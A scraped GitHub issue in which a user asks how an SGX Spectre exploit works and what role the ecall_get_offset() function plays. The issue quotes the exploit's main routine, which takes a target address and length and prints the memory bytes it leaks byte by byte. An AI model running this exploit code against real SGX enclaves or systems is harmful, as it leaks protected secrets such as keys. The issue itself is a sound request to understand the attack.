We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Could anyone explain the working mechanism of sgx spectre attack ?
How is ecall_get_offset() caching function actually used in this sgx spectre exploit ?
ecall_get_offset()
int spectre_main(int argc, char **argv) { size_t malicious_x; sgx_status_t ret = ecall_get_offset(global_eid, &malicious_x); /* default for malicious_x */ if (ret != SGX_SUCCESS) abort(); int i, score[2], len=40; uint8_t value[2]; for (i = 0; i < sizeof(array2); i++) array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */ if (argc == 3) { sscanf(argv[1], "%p", (void**)(&malicious_x)); malicious_x -= (size_t)array1dupe; /* Convert input value into a pointer */ sscanf(argv[2], "%d", &len); } printf("Reading %d bytes:\n", len); while (--len >= 0) { printf("Reading at malicious_x = %p... ", (void*)malicious_x); readMemoryByte(malicious_x++, value, score); printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear")); printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]); if (score[1] > 0) printf("(second best: 0x%02X score=%d)", value[1], score[1]); printf("\n"); } return (0); }
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Could anyone explain the working mechanism of sgx spectre attack ?
How is
ecall_get_offset()caching function actually used in this sgx spectre exploit ?The text was updated successfully, but these errors were encountered: